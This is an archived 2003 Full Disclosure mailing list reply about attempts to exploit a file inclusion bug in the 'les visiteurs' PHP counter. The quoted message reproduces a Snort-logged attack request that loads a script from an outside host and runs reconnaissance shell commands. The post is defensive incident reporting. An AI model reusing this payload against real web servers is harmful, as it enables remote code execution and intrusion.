Full Disclosure mailing list archives
Re: file inclusion (les visiteurs)
From: Dan <dan () lockedbox net>
Date: Mon, 1 Dec 2003 17:02:16 +0000
This is the same set of files that I noticed last week(xfteam.net) it seems they closed their domain down? (I cannot find it) Does anyone know if these ppl are a real sec organisation? or just some kiddies ? Cheers, Daniel. "Evert Daman" <evert () digipix org> wrote:
last night snort detected this request: GET
/counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
because i patched 'les visiteurs' as described by 'matthieu peschaud' on bugtraq on the 26 of october nothing happend, but it looks like someone is trying to exploit this bug. just want to mention it to this wonderfull list :) kind regards, Evert
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- file inclusion (les visiteurs) Evert Daman (Dec 01)
- Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 01)
- Re: file inclusion (les visiteurs) Dan (Dec 01)
- Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 01)
- Re: file inclusion (les visiteurs) Evert Daman (Dec 01)
- Re: file inclusion (les visiteurs) gazpa (Dec 01)
- Re: file inclusion (les visiteurs) Christian Horchert (Dec 01)
- Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 02)
- Re: file inclusion (les visiteurs) gazpa (Dec 02)
- Re: file inclusion (les visiteurs) Christian Horchert (Dec 02)
- Re: file inclusion (les visiteurs) Evert Daman (Dec 03)
- Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 01)
- Re: file inclusion (les visiteurs) Christian Horchert (Dec 01)